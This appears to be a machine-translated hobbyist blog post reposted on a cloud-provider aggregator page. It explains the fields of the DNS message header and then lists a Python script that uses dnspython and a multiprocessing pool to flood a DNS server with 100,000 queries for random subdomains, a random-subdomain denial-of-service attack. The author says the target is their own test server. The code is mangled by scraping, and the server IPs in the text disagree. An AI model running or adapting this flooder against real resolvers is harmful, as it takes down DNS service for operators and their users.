DNS traffic attacks via Python's Dnspython module

Source: Internet
Author: User
Tags response code domain name server

One

  I am a dish B, slowly groping in the study.

Install module PIP Install Dnspython

Using Python to invoke the Dnspython module, write a DNS attack applet, the target IP for their own DNS server, and can get the DNS flag return value, which can also use the program to view the return value, in fact, no eggs.

The message format for the associated DNS is probably as follows:

    

(1) public message header format where header headers are required, others are not defined in the message head:

Identity ID: The 16-bit flag of the request client setting, the server gives the answer with the same marked field back, so that the requesting client can distinguish between different request responses.

QR 1 bits are used to differentiate between a request (0) or an answer (1).

OPCODE 4 bits are used to set the type of query, the answer will take the same value, the following values are available:

0 Standard Queries (query)

1 reverse query (iquery)

2 Server state query (status)

3-15 reserved value, not used temporarily

AA Authorization Answer (authoritative Answer)-this bit is meaningful at the time of the reply, indicating that the server that gives the answer is the authorization resolution server that queries the domain name.

Note Because the alias exists, the answer may have more than one primary domain name, the AA bit corresponding to the request name, or the first primary domain in the answer.

TC Truncation (truncation)-used to indicate that the message is longer than the allowable length, resulting in truncation.

RD expects recursion (recursion desired)-this bit is requested to be set, and the same value returned when the answer is used. If you set up Rd, it is recommended that you recursively parse the domain name server, and support for recursive queries is optional.

RA supports recursion (recursion Available)-this bit is set or canceled in the answer to indicate whether the server supports recursive queries.

Z reserved value, not used temporarily. Must be set to 0 in all requests and response messages.

RCODE Answer code (Response code)-These 4 bits are set in the response message, which means the following:

0 no errors.

1 Message Format error (format error)-The server does not understand the requested message.

2 Server failed (server failure)-This request was not handled because of a server cause.

3 Name error-only meaningful for the authoritative domain name resolution server, stating that the resolved domain name does not exist.

4 No implementation (not implemented)-the domain name server does not support query types.

5 Deny (refused)-the server refuses to give an answer due to a policy set. For example, the server does not want to answer to some requestors, or the server does not want to perform certain operations (such as zone transfer zones transfer).

6-15 reserved value, not used temporarily.

number of issues Qdcount unsigned 16-bit integers represent the number of problem records in the message request segment.

number of resource records Ancount unsigned 16-bit integer indicates the number of answer records in the message answer paragraph.

number of authorized resource records Nscount unsigned 16-bit integer indicates the number of authorization records in the Message authorization section.

number of additional resource records Arcount unsigned 16-bit integer indicates the number of additional records in the message attachment segment.

To tell the truth, I like this dish B really can not understand these.

Here is my small code, in fact, very simple: The relevant Dnspython module can refer to https://www.cnblogs.com/nicholas-920610/articles/7149057.html

 fromDnsImportMessage,queryImportRandomImportstringImportMultiprocessingImportThreadingdefFlagcount (Flags, POS):ifInt (flags/(2**pos))%2 = = 1:        returnTrueElse:        returnFalsedefGetFlags (Flags): Qr_pos= 15Aa_pos= 10Tc_pos= 9Rd_pos= 8Ra_pos= 7Qr_flag=Flagcount (Flags, qr_pos) Aa_flag=Flagcount (Flags, aa_pos) Tc_flag=Flagcount (Flags, tc_pos) Rd_flag=Flagcount (Flags, rd_pos) Ra_flag=Flagcount (Flags, ra_pos) Flag_dic= {"QR": Qr_flag,"AA": Aa_flag,"TC": Tc_flag,"RD": Rd_flag,"RA": Ra_flag} forFlag,vinchFlag_dic.items ():Print(Flag,':', V)defAttack (domain_name): Server='192.168.32.128'Port= 53Dns_query= Message.make_query (domain_name,'A') Response=query.udp (Dns_query,server,port)#Print (response)defgenerate_random_name (): Ch= List (string.ascii_lowercase) + list (map (Str,range (10)) Rand_ch= Random.sample (Ch,random.randint (3,10))    return "'. Join (RAND_CH)defstart_attack (): domain_name= Generate_random_name () +'. hjc.com'Attack (domain_name)Print(domain_name)if __name__=='__main__': P= multiprocessing. Pool (processes=Multiprocessing.cpu_count ()) for_inchRange (100000): P.apply_async (Start_attack) p.close () P.join ()#Print (response)    #For content in Response.answer:    #print (Content.to_text ())    #getflags (response.flags)

That's the way it is, not struggling.

The random domain name consists of the following as follows:

Tozmgde7.hjc.com
U2js79.hjc.com
Vru76f.hjc.com
9okeyptud.hjc.com
207lih.hjc.com

The bind service is turned on on my DNS server 192.168.5.128 and the Query_log log is turned on, and the related log request looks like this:

Combined with awk and other commands to count the number of requests a minute,

This is the case, I play a play, there is no actual test of the amount of attacks on the line, I would like to work hard to the unit and life of the great God to learn ah.

DNS traffic attacks via Python's Dnspython module

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.